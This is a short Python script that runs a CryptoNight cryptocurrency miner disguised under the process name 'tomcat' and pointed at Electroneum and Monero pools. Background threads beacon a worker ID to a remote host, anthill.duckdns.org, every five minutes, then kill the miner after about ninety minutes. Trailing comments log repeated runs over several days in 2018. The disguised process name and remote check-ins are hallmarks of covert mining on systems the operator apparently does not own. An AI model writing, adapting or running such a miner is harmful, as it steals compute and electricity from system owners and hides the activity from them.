import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:57:05.981033
#2018-02-17 16:44:06.149048
#2018-02-17 18:33:03.924357
#2018-02-17 20:21:06.066451
#2018-02-17 22:08:03.713410
#2018-02-17 23:52:07.912401
#2018-02-18 01:43:05.313387
#2018-02-18 03:31:07.383518
#2018-02-18 05:18:03.686249
#2018-02-18 07:10:07.610779
#2018-02-18 08:58:06.820485
#2018-02-18 10:45:04.085267
#2018-02-18 12:32:02.195461
#2018-02-18 14:19:06.250999
#2018-02-18 16:10:05.777940
#2018-02-18 17:57:02.252698
#2018-02-18 19:43:05.153488
#2018-02-18 21:29:04.108012
#2018-02-18 23:17:06.992066
#2018-02-19 01:04:05.968722
#2018-02-19 02:51:06.844446
#2018-02-19 04:38:01.343502
#2018-02-19 06:22:01.864084
#2018-02-19 08:11:06.936231
#2018-02-19 10:01:04.942815
#2018-02-19 11:50:08.766794
#2018-02-19 13:37:07.547112
#2018-02-19 15:24:06.613123
#2018-02-19 17:12:08.093890
#2018-02-19 19:01:07.999244
#2018-02-19 20:47:06.609043
#2018-02-19 22:35:04.646649
#2018-02-20 00:20:09.461216
#2018-02-20 02:10:01.331008
#2018-02-20 04:01:04.303324
#2018-02-20 05:44:02.068337
#2018-02-20 07:29:05.227719
#2018-02-20 09:13:07.764424
#2018-02-20 10:58:09.938615
#2018-02-20 12:47:09.026932
#2018-02-20 14:31:06.264808
#2018-02-20 16:17:01.639545
#2018-02-20 18:03:10.138209
#2018-02-20 19:53:01.527129
#2018-02-20 21:42:06.088142
#2018-02-20 23:24:08.007143
#2018-02-21 01:09:07.542484
#2018-02-21 02:57:04.126533
#2018-02-21 04:45:07.158125
#2018-02-21 06:33:03.996897
#2018-02-21 08:18:05.625219
#2018-02-21 10:04:08.524719
#2018-02-21 11:53:07.043284
#2018-02-21 13:44:01.405198
#2018-02-21 15:34:11.998582
#2018-02-21 17:26:02.246373
#2018-02-21 19:15:09.222266
#2018-02-21 21:04:04.773116
#2018-02-21 22:51:07.495104
#2018-02-22 00:41:03.688007
#2018-02-22 02:28:01.655156
#2018-02-22 04:14:07.231458
#2018-02-22 05:59:01.377280
#2018-02-22 07:46:03.860234
#2018-02-22 09:34:08.342286
#2018-02-22 11:20:11.215513
#2018-02-22 13:06:06.245755
#2018-02-22 14:54:08.133559
#2018-02-22 16:39:08.160059
#2018-02-22 18:25:08.521069
#2018-02-22 20:20:09.459939
#2018-02-22 22:07:01.795898
#2018-02-22 23:55:05.939371
#2018-02-23 01:43:06.312687
#2018-02-23 03:32:07.100156
#2018-02-23 05:17:06.489891
#2018-02-23 07:04:07.074170
#2018-02-23 08:54:06.820721
#2018-02-23 11:11:06.213117
#2018-02-23 13:06:07.255399
#2018-02-23 14:51:06.822424
#2018-02-23 16:40:06.516886
#2018-02-23 18:26:08.109648
#2018-02-23 20:10:09.832235
#2018-02-23 21:59:04.294565
#2018-02-23 23:48:04.472446
#2018-02-24 01:39:07.103655
#2018-02-24 03:29:06.435046
#2018-02-24 05:15:08.647962
#2018-02-24 07:03:07.470842
#2018-02-24 08:34:06.342701
#2018-02-24 10:11:03.572400
#2018-02-24 11:56:06.361342
#2018-02-24 13:23:01.580363
#2018-02-24 14:55:06.608108
#2018-02-24 16:29:06.343634
#2018-02-24 18:05:09.423406
#2018-02-24 19:33:05.285145
#2018-02-24 21:09:05.578213
#2018-02-24 23:16:05.633162
#2018-02-25 01:36:05.306741
#2018-02-25 05:26:01.667275
#2018-02-25 11:35:08.321932